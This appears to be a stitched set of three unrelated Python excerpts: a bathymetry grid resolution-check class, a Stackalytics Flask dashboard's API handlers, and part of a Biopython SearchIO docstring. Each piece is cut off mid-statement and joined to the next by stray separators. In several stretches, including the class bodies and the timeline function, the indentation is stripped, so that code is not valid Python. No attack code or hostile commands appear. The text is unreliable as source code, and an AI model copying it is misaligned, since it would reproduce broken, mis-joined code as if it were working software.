"failed_cell_count": self.failed_cell_count,
"total_cell_count": self.total_cell_count,
"fraction_failed": self.failed_cell_count / self.total_cell_count,
}
if self.spatial_qajson:
data['map'] = self.tiles_geojson
if self.failed_cell_count > 0:
percent_failed = (
self.failed_cell_count / self.total_cell_count * 100
)
msg = (
f"{self.failed_cell_count} nodes failed the TVU check this "
f"represents {percent_failed:.1f}% of all nodes within data."
)
return QajsonOutputs(
execution=execution,
files=None,
count=None,
percentage=None,
messages=[msg],
data=data,
check_state=GridCheckState.cs_fail
)
else:
return QajsonOutputs(
execution=execution,
files=None,
count=None,
percentage=None,
messages=[],
data=data,
check_state=GridCheckState.cs_pass
)
class ResolutionCheck(GridCheck):
'''
Determines what areas of the grid satisfy a resolution check. The check
first calculates a feature detection size (fds) on a per pixel basis, two
values for this are calculated above and below a threshold depth. In both
cases the fds value is calculated from the pixels depth and linear equation
parameters provided as input parameters to this check. eg;
fds = Depth Multiplier * depth + Depth Constant
    This equation is calculated using a different Depth Multiplier
    and Depth Constant depending on whether the depth at that location is
    above or below the threshold.
Once fds has been calculated per pixel a boolean check is performed to find
pixels where the grid resolution is lower than the fds * feature
detection multiplier. If any pixel is false, then the QA check fails.
'''
id = 'c73119ea-4f79-4001-86e3-11c4cbaaeb2d'
name = 'Resolution Check'
version = '1'
# default values taken from IHO - 1a spec
input_params = [
QajsonParam("Feature Detection Size Multiplier", 0.5),
QajsonParam("Threshold Depth", 40.0),
QajsonParam("Above Threshold FDS Depth Multiplier", 0.0),
QajsonParam("Above Threshold FDS Depth Constant", 2.0),
QajsonParam("Below Threshold FDS Depth Multiplier", 0.05),
QajsonParam("Below Threshold FDS Depth Constant", 0.0)
]
def __init__(self, input_params: List[QajsonParam]):
super().__init__(input_params)
self._fds_multiplier = self.get_param(
'Feature Detection Size Multiplier')
self._threshold_depth = self.get_param(
'Threshold Depth')
self._a_fds_depth_multiplier = self.get_param(
'Above Threshold FDS Depth Multiplier')
self._a_fds_depth_constant = self.get_param(
'Above Threshold FDS Depth Constant')
self._b_fds_depth_multiplier = self.get_param(
'Below Threshold FDS Depth Multiplier')
self._b_fds_depth_constant = self.get_param(
'Below Threshold FDS Depth Constant')
self.tiles_geojson = MultiPolygon()
# amount of padding to place around failing pixels
# this simplifies the geometry, and enlarges the failing area that
# will allow it to be shown in the UI more easily
self.pixel_growth = 5
def merge_results(self, last_check: GridCheck):
self.start_time = last_check.start_time
self.total_cell_count += last_check.total_cell_count
self.failed_cell_count += last_check.failed_cell_count
self.tiles_geojson.coordinates.extend(
last_check.tiles_geojson.coordinates
)
self._merge_temp_dirs(last_check)
    def run(
            self,
            ifd: InputFileDetails,
            tile: Tile,
            depth,
            density,
            uncertainty,
            progress_callback=None):
        """Run the resolution check over one tile of the grid.

        Computes a per-pixel feature detection size (fds) from *depth*,
        counts pixels whose allowable grid size is below the grid
        resolution, and optionally vectorises the failing pixels for the
        QAJSON map and/or writes spatial debug products to temp files.
        """
        # run check on tile data
        self.grid_resolution = ifd.geotransform[1]
        # count of all cells/nodes/pixels that are not NaN in the uncertainty
        # array
        self.total_cell_count = int(depth.count())
        # skip processing this chunk of data if it contains only nodata
        if self.total_cell_count == 0:
            self.failed_cell_count = 0
            return
        abs_depth = np.abs(depth)
        abs_threshold_depth = abs(self._threshold_depth)
        # refer to docs at top of class defn, this is described there
        fds = np.piecewise(
            abs_depth,
            [
                abs_depth < abs_threshold_depth,
                abs_depth >= abs_threshold_depth
            ],
            [
                lambda d: self._a_fds_depth_multiplier * d + self._a_fds_depth_constant,
                lambda d: self._b_fds_depth_multiplier * d + self._b_fds_depth_constant
            ]
        )
        # re-apply the nodata mask of the depth array to the fds result
        fds = np.ma.masked_where(np.ma.getmask(depth), fds)
        allowable_grid_size = fds * self._fds_multiplier
        # The idea of the standard here is that the deeper the water gets the
        # less ability you have to pick up features on the seafloor and also
        # features become less important the deeper the water gets as under
        # keel clearance for ships becomes less of an issue.
        failed_resolution = allowable_grid_size < self.grid_resolution
        # masked (nodata) cells are filled as False, i.e. counted as passing
        failed_resolution.fill_value = False
        failed_resolution = failed_resolution.filled()
        failed_resolution_int8 = failed_resolution.astype(np.int8)
        # count of cells that failed the check
        self.failed_cell_count = int(failed_resolution.sum())
        if not (self.spatial_export or self.spatial_export_location):
            # if we don't generate spatial outputs, then there's no
            # need to do any further processing
            return
        # affine transform for this tile within the source raster
        src_affine = Affine.from_gdal(*ifd.geotransform)
        tile_affine = src_affine * Affine.translation(
            tile.min_x,
            tile.min_y
        )
        ogr_srs = osr.SpatialReference()
        ogr_srs.ImportFromWkt(ifd.projection)
        # see notes on density check for more details on the processing performed
        # below
        if self.spatial_qajson:
            # grow out failed pixels to make them more obvious. We've already
            # calculated the pass/fail stats so this won't impact results.
            failed_resolution_int8_grow = self._grow_pixels(
                failed_resolution_int8, self.pixel_growth)
            # simplify distance is calculated as the distance pixels are grown out
            # `ifd.geotransform[1]` is pixel size
            simplify_distance = self.pixel_growth * ifd.geotransform[1]
            tile_failed_ds = gdal.GetDriverByName('MEM').Create(
                '',
                tile.max_x - tile.min_x,
                tile.max_y - tile.min_y,
                1,
                gdal.GDT_Byte
            )
            tile_failed_ds.SetGeoTransform(tile_affine.to_gdal())
            tile_failed_band = tile_failed_ds.GetRasterBand(1)
            tile_failed_band.WriteArray(failed_resolution_int8_grow, 0, 0)
            tile_failed_band.SetNoDataValue(0)
            tile_failed_band.FlushCache()
            tile_failed_ds.SetProjection(ifd.projection)
            ogr_driver = ogr.GetDriverByName('Memory')
            ogr_dataset = ogr_driver.CreateDataSource('shapemask')
            ogr_layer = ogr_dataset.CreateLayer('shapemask', srs=ogr_srs)
            # used the input raster data 'tile_band' as the input and mask, if not
            # used as a mask then a feature that outlines the entire dataset is
            # also produced
            gdal.Polygonize(
                tile_failed_band,
                tile_failed_band,
                ogr_layer,
                -1,
                [],
                callback=None
            )
            ogr_simple_driver = ogr.GetDriverByName('Memory')
            ogr_simple_dataset = ogr_simple_driver.CreateDataSource(
                'failed_poly')
            ogr_simple_layer = ogr_simple_dataset.CreateLayer(
                'failed_poly', srs=None)
            self._simplify_layer(
                ogr_layer,
                ogr_simple_layer,
                simplify_distance)
            ogr_srs_out = osr.SpatialReference()
            ogr_srs_out.ImportFromEPSG(4326)
            transform = osr.CoordinateTransformation(ogr_srs, ogr_srs_out)
            for feature in ogr_simple_layer:
                # transform feature into epsg:4326 before export to geojson
                transformed = feature.GetGeometryRef()
                transformed.Transform(transform)
                geojson_feature = geojson.loads(feature.ExportToJson())
                self.tiles_geojson.coordinates.extend(
                    geojson_feature.geometry.coordinates
                )
            ogr_simple_dataset.Destroy()
            ogr_dataset.Destroy()
        if self.spatial_export:
            # replace masked cells with the nodata value for the GeoTIFF
            allowable_grid_size.fill_value = -9999.0
            allowable_grid_size = allowable_grid_size.filled()
            ar = self._get_tmp_file('allowable_resolution', 'tif', tile)
            tile_ds = gdal.GetDriverByName('GTiff').Create(
                ar,
                tile.max_x - tile.min_x,
                tile.max_y - tile.min_y,
                1,
                gdal.GDT_Float32,
                options=['COMPRESS=DEFLATE']
            )
            tile_ds.SetGeoTransform(tile_affine.to_gdal())
            tile_band = tile_ds.GetRasterBand(1)
            tile_band.WriteArray(allowable_grid_size, 0, 0)
            tile_band.SetNoDataValue(-9999.0)
            tile_band.FlushCache()
            tile_ds.SetProjection(ifd.projection)
            tf = self._get_tmp_file('failed_resolution', 'tif', tile)
            tile_failed_ds = gdal.GetDriverByName('GTiff').Create(
                tf,
                tile.max_x - tile.min_x,
                tile.max_y - tile.min_y,
                1,
                gdal.GDT_Byte,
                options=['COMPRESS=DEFLATE']
            )
            tile_failed_ds.SetGeoTransform(tile_affine.to_gdal())
            tile_failed_band = tile_failed_ds.GetRasterBand(1)
            tile_failed_band.WriteArray(failed_resolution_int8, 0, 0)
            tile_failed_band.SetNoDataValue(0)
            tile_failed_band.FlushCache()
            tile_failed_ds.SetProjection(ifd.projection)
            sf = self._get_tmp_file('failed_resolution', 'shp', tile)
            ogr_driver = ogr.GetDriverByName("ESRI Shapefile")
            ogr_dataset = ogr_driver.CreateDataSource(sf)
            ogr_layer = ogr_dataset.CreateLayer(
                'failed_resolution', srs=ogr_srs)
            # used the input raster data 'tile_band' as the input and mask, if not
            # used as a mask then a feature that outlines the entire dataset is
            # also produced
            gdal.Polygonize(
                tile_failed_band,
                tile_failed_band,
                ogr_layer,
                -1,
                [],
                callback=None
            )
            # dereference to close the GDAL datasets
            tile_ds = None
            tile_failed_ds = None
            ogr_dataset.Destroy()
        self._move_tmp_dir()
def get_outputs(self) -> QajsonOutputs:
execution = QajsonExecution(
start=self.start_time,
end=self.end_time,
status=self.execution_status,
error=self.error_message
)
data = {
"failed_cell_count": self.failed_cell_count,
"total_cell_count": self.total_cell_count,
"fraction_failed": self.failed_cell_count / self.total_cell_count,
"grid_resolution": self.grid_resolution
}
if self.spatial_qajson:
data['map'] = self.tiles_geojson
if self.failed_cell_count > 0:
percent_failed = (
self.failed_cell_count / self.total_cell_count * 100
)
msg = | |
<gh_stars>0
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import operator
import os
import time
import flask
from oslo_config import cfg
from oslo_log import log as logging
import six
from stackalytics.dashboard import config
from stackalytics.dashboard import decorators
from stackalytics.dashboard import helpers
from stackalytics.dashboard import kpi
from stackalytics.dashboard import parameters
from stackalytics.dashboard import reports
from stackalytics.dashboard import vault
from stackalytics.processor import config as processor_cfg
from stackalytics.processor import utils
# Application objects ---------
# Flask application; configuration may be overridden via the file named by
# the DASHBOARD_CONF environment variable (silently skipped when unset).
app = flask.Flask(__name__)
app.config.from_object(__name__)
app.config.from_envvar('DASHBOARD_CONF', silent=True)
# mount the reports and KPI sub-applications under their own URL prefixes
app.register_blueprint(reports.blueprint)
app.register_blueprint(kpi.blueprint)
LOG = logging.getLogger(__name__)  # module-level logger
CONF = cfg.CONF
# register processor connection options plus dashboard-specific options
CONF.register_opts(processor_cfg.CONNECTION_OPTS + config.DASHBOARD_OPTS)
# Handlers ---------
@app.route('/')
@decorators.templated()
def overview():
    """Landing page; the @templated decorator renders the matching template."""
    pass
@app.route('/cncf')
@decorators.templated()
def cncf():
    """CNCF page; the @templated decorator renders the matching template."""
    pass
@app.route('/unaffiliated')
@decorators.templated()
def unaffiliated():
    """Unaffiliated-contributors page; rendered by the @templated decorator."""
    pass
@app.route('/widget')
def widget():
    """Serve the embeddable statistics widget page."""
    return flask.render_template('widget.html')
# AJAX Handlers ---------
def _get_aggregated_stats(records, metric_filter, keys, param_id,
                          param_title=None, finalize_handler=None):
    """Aggregate records into per-key metric rows.

    Returns a list of dicts {'id', 'name', 'metric', ...} sorted by
    metric in descending order, with an index assigned to every row
    (the '*independent' pseudo-company is excluded from indexing).
    """
    title_attr = param_title or param_id
    stats = {key: {'metric': 0, 'id': key} for key in keys}
    context = {'vault': vault.get_vault()}
    if metric_filter:
        # delegate metric accumulation to the supplied filter callback
        for record in records:
            metric_filter(stats, record, param_id, context)
            stats[getattr(record, param_id)]['name'] = (
                getattr(record, title_attr))
    else:
        # default metric: plain record count per key
        for record in records:
            row = stats[getattr(record, param_id)]
            row['metric'] += 1
            row['name'] = getattr(record, title_attr)
    response = [row for row in stats.values() if row['metric']]
    if finalize_handler:
        response = [row for row in map(finalize_handler, response) if row]
    response.sort(key=lambda row: row['metric'], reverse=True)
    utils.add_index(response, item_filter=lambda row: row['id'] != '*independent')
    return response
@app.route('/api/1.0/new_companies')
@decorators.exception_handler()
@decorators.response()
@decorators.jsonify('stats')
@decorators.record_filter(ignore=['start_date'])
def get_new_companies(records, **kwargs):
    """Companies whose earliest record falls within the last N days.

    N comes from the optional ``days`` request argument, defaulting to
    reports.DEFAULT_DAYS_COUNT.
    """
    days = int(flask.request.args.get('days') or reports.DEFAULT_DAYS_COUNT)
    start_date = int(time.time()) - days * 24 * 60 * 60
    earliest = {}  # company name -> earliest record date seen
    for record in records:
        name = record.company_name
        if name not in earliest or earliest[name] > record.date:
            earliest[name] = record.date
    response = [{'name': name,
                 'date': date,
                 'date_str': helpers.format_date(date)}
                for name, date in earliest.items()
                if date >= start_date]
    response.sort(key=lambda x: x['date'], reverse=True)
    utils.add_index(response)
    return response
@app.route('/api/1.0/stats/companies')
@decorators.exception_handler()
@decorators.response()
@decorators.cached()
@decorators.jsonify('stats')
@decorators.record_filter()
@decorators.aggregate_filter()
def get_companies(records, metric_filter, finalize_handler, **kwargs):
    """Aggregated statistics keyed by company."""
    company_keys = vault.get_memory_storage().get_companies()
    return _get_aggregated_stats(records, metric_filter, company_keys,
                                 'company_name',
                                 finalize_handler=finalize_handler)
@app.route('/api/1.0/stats/modules')
@decorators.exception_handler()
@decorators.response()
@decorators.cached()
@decorators.jsonify('stats')
@decorators.record_filter()
@decorators.aggregate_filter()
def get_modules(records, metric_filter, finalize_handler, **kwargs):
    """Aggregated statistics keyed by module."""
    module_keys = vault.get_memory_storage().get_modules()
    return _get_aggregated_stats(records, metric_filter, module_keys,
                                 'module', finalize_handler=finalize_handler)
def get_core_engineer_branch(user, modules):
    """Return the branch on which the user is a core reviewer, or None.

    Scans the user's ``core`` entries restricted to *modules*; 'master'
    wins over stable branches as soon as it is seen.
    """
    best = None
    for module, branch in (user.get('core') or []):
        if module not in modules:
            continue
        best = branch
        if branch == 'master':  # master is preferable, but stables are ok
            break
    return best
@app.route('/api/1.0/stats/engineers')
@decorators.exception_handler()
@decorators.response()
@decorators.cached()
@decorators.jsonify('stats')
@decorators.record_filter()
@decorators.aggregate_filter()
def get_engineers(records, metric_filter, finalize_handler, **kwargs):
    """Aggregated statistics keyed by engineer, annotated with core branch."""
    module_names = parameters.get_parameter(kwargs, 'module')
    modules = {m for m, _ in vault.resolve_modules(module_names, [''])}

    def postprocessing(record):
        # apply the upstream finalizer first, then attach core-reviewer info
        if finalize_handler:
            record = finalize_handler(record)
        user = vault.get_user_from_runtime_storage(record['id'])
        record['core'] = get_core_engineer_branch(user, modules)
        return record

    return _get_aggregated_stats(records, metric_filter,
                                 vault.get_memory_storage().get_user_ids(),
                                 'user_id', 'author_name',
                                 finalize_handler=postprocessing)
@app.route('/api/1.0/stats/engineers_extended')
@decorators.exception_handler()
@decorators.response()
@decorators.cached(ignore=['metric'])
@decorators.jsonify('stats')
@decorators.record_filter(ignore=['metric'])
def get_engineers_extended(records, **kwargs):
    """Per-engineer counters for every activity type (mark, review, ...)."""
    modules_names = parameters.get_parameter(kwargs, 'module')
    modules = set([m for m, r in vault.resolve_modules(modules_names, [''])])
    def postprocessing(record):
        # finalize review-mark aggregates and drop users without any activity
        record = decorators.mark_finalize(record)
        if not (record['mark'] or record['review'] or record['commit'] or
                record['email'] or record['patch']):
            return
        user = vault.get_user_from_runtime_storage(record['id'])
        record['company'] = helpers.get_current_company(user)
        record['core'] = get_core_engineer_branch(user, modules)
        return record
    def record_processing(result, record, param_id):
        # bump the per-record-type counter; marks additionally feed the
        # review-mark distribution via decorators.mark_filter
        result_row = result[getattr(record, param_id)]
        record_type = record.record_type
        result_row[record_type] = result_row.get(record_type, 0) + 1
        if record_type == 'mark':
            decorators.mark_filter(result, record, param_id, {})
    result = {}
    for record in records:
        user_id = record.user_id
        if user_id not in result:
            # seed a zeroed counter row for a user seen for the first time
            result[user_id] = {'id': user_id, 'mark': 0, 'review': 0,
                               'commit': 0, 'email': 0, 'patch': 0,
                               'metric': 0}
        record_processing(result, record, 'user_id')
        result[user_id]['name'] = record.author_name
    response = result.values()
    response = [item for item in map(postprocessing, response) if item]
    response.sort(key=lambda x: x['metric'], reverse=True)
    utils.add_index(response)
    return response
@app.route('/api/1.0/stats/distinct_engineers')
@decorators.exception_handler()
@decorators.response()
@decorators.cached()
@decorators.jsonify('stats')
@decorators.record_filter()
def get_distinct_engineers(records, **kwargs):
    """Map user_id -> {author_name, author_email} for the matching records."""
    return {record.user_id: {'author_name': record.author_name,
                             'author_email': record.author_email}
            for record in records}
@app.route('/api/1.0/activity')
@decorators.exception_handler()
@decorators.response()
@decorators.jsonify('activity')
@decorators.record_filter()
def get_activity_json(records, **kwargs):
    """Paged activity log for the current filter selection."""
    args = flask.request.args
    start_record = int(args.get('start_record') or 0)
    page_size = int(args.get('page_size') or parameters.DEFAULT_RECORDS_LIMIT)
    query_message = args.get('query_message')
    return helpers.get_activity(records, start_record, page_size,
                                query_message)
@app.route('/api/1.0/contribution')
@decorators.exception_handler()
@decorators.response()
@decorators.cached(ignore=['metric'])
@decorators.jsonify('contribution')
@decorators.record_filter(ignore=['metric'])
def get_contribution_json(records, **kwargs):
    """Contribution summary for the selected records."""
    return helpers.get_contribution_summary(records)
@app.route('/api/1.0/companies')
@decorators.exception_handler()
@decorators.response()
@decorators.cached(ignore=['company'])
@decorators.jsonify()
@decorators.record_filter(ignore=['company'])
def get_companies_json(record_ids, **kwargs):
    """Companies referenced by the selected records, as select2 options."""
    memory_storage = vault.get_memory_storage()
    companies = set(memory_storage.get_index_keys_by_record_ids(
        'company_name', record_ids))
    selected = kwargs['_params']['company']
    if selected:
        # make sure the explicitly requested company is always present
        companies.add(memory_storage.get_original_company_name(selected[0]))
    return [{'id': name.lower().replace('&', ''), 'text': name}
            for name in sorted(companies)]
@app.route('/api/1.0/modules')
@decorators.exception_handler()
@decorators.response()
@decorators.cached(ignore=['module'])
@decorators.jsonify()
@decorators.record_filter(ignore=['module'])
def get_modules_json(record_ids, **kwargs):
    """Modules and module groups referenced by the selected records."""
    module_id_index = vault.get_vault()['module_id_index']
    tags = parameters.get_parameter(kwargs, 'tag', plural_name='tags')
    # all modules mentioned in records
    module_ids = vault.get_memory_storage().get_index_keys_by_record_ids(
        'module', record_ids)
    # include every group that covers at least one mentioned module
    groups = {entry['id'] for entry in six.itervalues(module_id_index)
              if set(entry['modules']) & module_ids}
    module_ids |= groups
    # keep only modules with specified tags
    if tags:
        module_ids = {module_id for module_id in module_ids
                      if (module_id in module_id_index and
                          module_id_index[module_id].get('tag') in tags)}
    result = [{'id': module_id_index[module_id]['id'],
               'text': module_id_index[module_id]['module_group_name'],
               'tag': module_id_index[module_id]['tag']}
              for module_id in module_ids]
    return sorted(result, key=operator.itemgetter('text'))
@app.route('/api/1.0/companies/<company_name>')
@decorators.response()
@decorators.cached()
@decorators.jsonify('company')
def get_company(company_name, **kwargs):
    """Look up a single company by case-insensitive name; 404 when unknown."""
    memory_storage_inst = vault.get_memory_storage()
    wanted = company_name.lower()
    for known in memory_storage_inst.get_companies():
        if known.lower() == wanted:
            return {'id': company_name,
                    'text': memory_storage_inst.get_original_company_name(
                        company_name)}
    flask.abort(404)
@app.route('/api/1.0/modules/<module_id>')
@decorators.response()
@decorators.cached()
@decorators.jsonify('module')
def get_module(module_id, **kwargs):
    """Details for one module, scoped by project type and release; 404 if absent."""
    project_type = parameters.get_single_parameter(kwargs, 'project_type')
    release = parameters.get_single_parameter(kwargs, 'release')
    module = helpers.extend_module(module_id, project_type, release)
    if module:
        return module
    flask.abort(404)  # abort raises, so no fall-through
@app.route('/api/1.0/members')
@decorators.exception_handler()
@decorators.response()
@decorators.cached(ignore=['release', 'project_type', 'module'])
@decorators.jsonify('members')
@decorators.record_filter(ignore=['release', 'project_type', 'module'])
def get_members(records, **kwargs):
    """Foundation membership records, newest first, with formatted dates."""
    response = []
    for record in records:
        extended = vault.extend_record(record)
        row = {key: extended[key] for key in
               ('author_name', 'date', 'company_name', 'member_uri')}
        row['date_str'] = helpers.format_date(row['date'])
        response.append(row)
    response.sort(key=lambda x: x['date'], reverse=True)
    utils.add_index(response)
    return response
@app.route('/api/1.0/stats/bp')
@decorators.exception_handler()
@decorators.response()
@decorators.cached()
@decorators.jsonify('stats')
@decorators.record_filter()
def get_bpd(records, **kwargs):
    """Blueprint statistics sorted by mention count (descending)."""
    result = []
    for record in records:
        if record.record_type not in ('bpd', 'bpc'):
            continue
        extended = vault.extend_record(record)
        mention_date = extended.get('mention_date')
        date = helpers.format_date(mention_date) if mention_date else 'never'
        result.append({
            'date': date,
            'status': extended['lifecycle_status'],
            'metric': extended.get('mention_count') or 0,
            'id': extended['name'],
            'name': extended['name'],
            'link': helpers.make_blueprint_link(extended['module'],
                                                extended['name'])
        })
    result.sort(key=lambda x: x['metric'], reverse=True)
    utils.add_index(result)
    return result
@app.route('/api/1.0/languages')
@decorators.exception_handler()
@decorators.response()
@decorators.cached(ignore=['language'])
@decorators.jsonify()
@decorators.record_filter(ignore=['language'])
def get_languages_json(record_ids, **kwargs):
    """Distinct languages seen in the selected records, as select2 options."""
    memory_storage = vault.get_memory_storage()
    languages = {record.value
                 for record in memory_storage.get_records(record_ids)}
    return [{'id': lang.lower().replace('&', ''), 'text': lang}
            for lang in sorted(languages)]
@app.route('/api/1.0/stats/languages')
@decorators.exception_handler()
@decorators.response()
@decorators.cached()
@decorators.jsonify('stats')
@decorators.record_filter(ignore=['language'])
def get_languages(records, **kwargs):
    """Lines-of-code totals per language for translation ('tr') records."""
    totals = collections.defaultdict(int)
    for record in records:
        if record.record_type in ['tr']:
            totals[record.value] += record.loc
    result = [{'id': lang, 'name': lang, 'metric': loc}
              for lang, loc in six.iteritems(totals)]
    result.sort(key=lambda x: x['metric'], reverse=True)
    utils.add_index(result)
    return result
@app.route('/api/1.0/users')
@decorators.exception_handler()
@decorators.response()
@decorators.cached(ignore=['user_id'])
@decorators.jsonify()
@decorators.record_filter(ignore=['user_id'])
def get_users_json(record_ids, **kwargs):
    """Users referenced by the selected records, as select2 options.

    When ``core_in`` is given (comma-separated branch names) the list is
    restricted to users who are core reviewers on one of those branches in
    the modules resolved from the selected project types and releases.
    """
    core_in = parameters.get_single_parameter(kwargs, 'core_in') or None
    valid_modules = set()
    if core_in:
        core_in = set(core_in.split(','))
        # modules belonging to the selected project types/releases
        valid_modules = vault.resolve_project_types(
            kwargs['_params']['project_type'])
        valid_modules = set(m[0] for m in vault.resolve_modules(
            valid_modules, kwargs['_params']['release']))
    user_ids = vault.get_memory_storage().get_index_keys_by_record_ids(
        'user_id', record_ids)
    if kwargs['_params']['user_id']:
        # always include the explicitly requested user
        user_ids.add(kwargs['_params']['user_id'][0])
    result = []
    for user_id in user_ids:
        user = vault.get_user_from_runtime_storage(user_id)
        r = {'id': user_id, 'text': user.get('user_name') or user['user_id']}
        # without a core_in filter every user is included
        add_flag = not core_in
        if core_in and user.get('core'):
            # keep only users core on one of the requested branches/modules
            core_modules = [module_branch[0] for module_branch in user['core']
                            if (module_branch[1] in core_in and
                                module_branch[0] in valid_modules)]
            if core_modules:
                r['core'] = core_modules
                if user['companies']:
                    r['company_name'] = helpers.get_current_company(user)
                add_flag = True
        if add_flag:
            result.append(r)
    result.sort(key=lambda x: x['text'])
    return result
@app.route('/api/1.0/users/<user_id>')
@decorators.response()
@decorators.jsonify('user')
def get_user(user_id):
    """Details for a single user; 404 when the id is unknown."""
    user = vault.get_user_from_runtime_storage(user_id)
    if not user:
        flask.abort(404)
    return helpers.extend_user(user)
@app.route('/api/1.0/releases')
@decorators.exception_handler()
@decorators.response()
@decorators.cached(ignore=parameters.FILTER_PARAMETERS)
@decorators.jsonify(root=('data', 'default'))
def get_releases_json(**kwargs):
    """Known releases, newest first, preceded by the synthetic 'all' entry."""
    choices = [{'id': 'all', 'text': 'All'}]
    # iterate releases in reverse so the most recent comes right after 'all'
    for release in reversed(list(vault.get_vault()['releases'].values())):
        choices.append({'id': release['release_name'],
                        'text': release['release_name'].capitalize(),
                        'project': release.get('project')})
    return choices, parameters.get_default('release')
@app.route('/api/1.0/metrics')
@decorators.exception_handler()
@decorators.response()
@decorators.cached(ignore=parameters.FILTER_PARAMETERS)
@decorators.jsonify(root=('data', 'default'))
def get_metrics_json(**kwargs):
    """All known metrics sorted by label, plus the default metric id."""
    metrics = [{'id': metric, 'text': label}
               for metric, label in six.iteritems(parameters.METRIC_LABELS)]
    metrics.sort(key=operator.itemgetter('text'))
    return metrics, parameters.get_default('metric')
@app.route('/api/1.0/project_types')
@decorators.response()
@decorators.exception_handler()
@decorators.cached(ignore=parameters.FILTER_PARAMETERS)
@decorators.jsonify(root=('data', 'default'))
def get_project_types_json(**kwargs):
    """All project types (id, title, child flag) plus the default selection."""
    options = []
    for pt in vault.get_project_types():
        options.append({'id': pt['id'],
                        'text': pt['title'],
                        'child': pt.get('child', False)})
    return options, parameters.get_default('project_type')
@app.route('/api/1.0/affiliation_changes')
@decorators.exception_handler()
@decorators.response()
@decorators.jsonify('affiliation_changes')
def get_company_changes(**kwargs):
    """List users who changed company affiliation within a date range.

    Reads optional ``start_days`` / ``end_days`` request arguments (date
    strings); defaults to the 365-day window ending now.
    """
    start_days = str(flask.request.args.get('start_days') or
                     utils.timestamp_to_date(int(time.time()) -
                                             365 * 24 * 60 * 60))
    end_days = str(flask.request.args.get('end_days') or
                   utils.timestamp_to_date(int(time.time())))
    start_date = utils.date_to_timestamp_ext(start_days)
    end_date = utils.date_to_timestamp_ext(end_days)
    runtime_storage = vault.get_runtime_storage()
    result = []
    for user in runtime_storage.get_all_users():
        companies = user.get('companies') or []
        if len(companies) < 2:
            continue  # no affiliation change without at least two entries
        companies_iter = iter(companies)
        # bug fix: was companies_iter.next(), which exists only on Python 2
        # iterators; the builtin next() works on both Python 2 and 3
        company = next(companies_iter)
        old_company_name = company['company_name']
        date = company['end_date']
        # each subsequent entry marks a change occurring at the previous
        # entry's end_date
        for company in companies_iter:
            new_company_name = company['company_name']
            if start_date <= date <= end_date:
                result.append({
                    'user_id': user['user_id'],
                    'user_name': user['user_name'],
                    'old_company_name': old_company_name,
                    'new_company_name': new_company_name,
                    'date': date,
                })
            old_company_name = new_company_name
            date = company['end_date']
    return result
def _get_week(kwargs, param_name):
    """Resolve a date parameter (or the vault's stored default) to a week number."""
    date_param = parameters.get_single_parameter(kwargs, param_name)
    ts = (utils.date_to_timestamp_ext(date_param) if date_param
          else vault.get_vault()[param_name])
    return utils.timestamp_to_week(ts)
@app.route('/api/1.0/stats/timeline')
@decorators.exception_handler()
@decorators.response()
@decorators.cached()
@decorators.jsonify('timeline')
@decorators.record_filter(ignore=['release', 'start_date'])
def timeline(records, **kwargs):
# find start and end dates
metric = parameters.get_parameter(kwargs, 'metric')
start_date = int(parameters.get_single_parameter(kwargs, 'start_date')
or 0)
release_name = parameters.get_single_parameter(kwargs, 'release') or 'all'
releases = vault.get_vault()['releases']
if 'all' in release_name:
start_week = release_start_week = _get_week(kwargs, 'start_date')
end_week = release_end_week = _get_week(kwargs, 'end_date')
else:
release = releases[release_name]
start_week = release_start_week = utils.timestamp_to_week(
release['start_date'])
end_week = release_end_week = utils.timestamp_to_week(
release['end_date'])
now = utils.timestamp_to_week(int(time.time())) + 1
# expand start-end to year if needed
if release_end_week - release_start_week < 52:
expansion = (52 - (release_end_week - release_start_week)) // 2
if release_end_week + expansion < now:
end_week += expansion
else:
end_week = now
start_week = end_week - 52
# empty stats for all weeks in range
weeks = range(start_week, end_week)
week_stat_loc = dict((c, 0) for c in weeks)
week_stat_commits = dict((c, 0) for c in weeks)
week_stat_commits_hl = | |
= allitems('hit_end',
doc="""List of all fragments' hit end coordinates""")
query_end_all = allitems('query_end',
doc="""List of all fragments' query end coordinates""")
hit_span_all = allitems('hit_span',
doc="""List of all fragments' hit sequence size""")
query_span_all = allitems('query_span',
doc="""List of all fragments' query sequence size""")
hit_range_all = allitems('hit_range',
doc="""List of all fragments' hit start and end coordinates""")
query_range_all = allitems('query_range',
doc="""List of all fragments' query start and end coordinates""")
class HSPFragment(_BaseHSP):
"""Class representing a contiguous alignment of hit-query sequence.
HSPFragment forms the core of any parsed search output file. Depending on
the search output file format, it may contain the actual query and/or hit
sequences that produces the search hits. These sequences are stored as
SeqRecord objects (see SeqRecord):
>>> from Bio import SearchIO
>>> qresult = next(SearchIO.parse('Blast/mirna.xml', 'blast-xml'))
>>> fragment = qresult[0][0][0] # first hit, first hsp, first fragment
>>> print(fragment)
Query: 33211 mir_1
Hit: gi|262205317|ref|NR_030195.1| Homo sapiens microRNA 520b (MIR520...
Query range: [0:61] (1)
Hit range: [0:61] (1)
Fragments: 1 (61 columns)
Query - CCCTCTACAGGGAAGCGCTTTCTGTTGTCTGAAAGAAAAGAAAGTGCTTCCTTTTAGAGGG
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Hit - CCCTCTACAGGGAAGCGCTTTCTGTTGTCTGAAAGAAAAGAAAGTGCTTCCTTTTAGAGGG
# the query sequence is a SeqRecord object
>>> fragment.query.__class__
<class 'Bio.SeqRecord.SeqRecord'>
>>> print(fragment.query)
ID: 33211
Name: aligned query sequence
Description: mir_1
Number of features: 0
Seq('CCCTCTACAGGGAAGCGCTTTCTGTTGTCTGAAAGAAAAGAAAGTGCTTCCTTT...GGG', DNAAlphabet())
# the hit sequence is a SeqRecord object as well
>>> fragment.hit.__class__
<class 'Bio.SeqRecord.SeqRecord'>
>>> print(fragment.hit)
ID: gi|262205317|ref|NR_030195.1|
Name: aligned hit sequence
Description: Homo sapiens microRNA 520b (MIR520B), microRNA
Number of features: 0
Seq('CCCTCTACAGGGAAGCGCTTTCTGTTGTCTGAAAGAAAAGAAAGTGCTTCCTTT...GGG', DNAAlphabet())
# when both query and hit are present, we get a MultipleSeqAlignment object
>>> fragment.aln.__class__
<class 'Bio.Align.MultipleSeqAlignment'>
>>> print(fragment.aln)
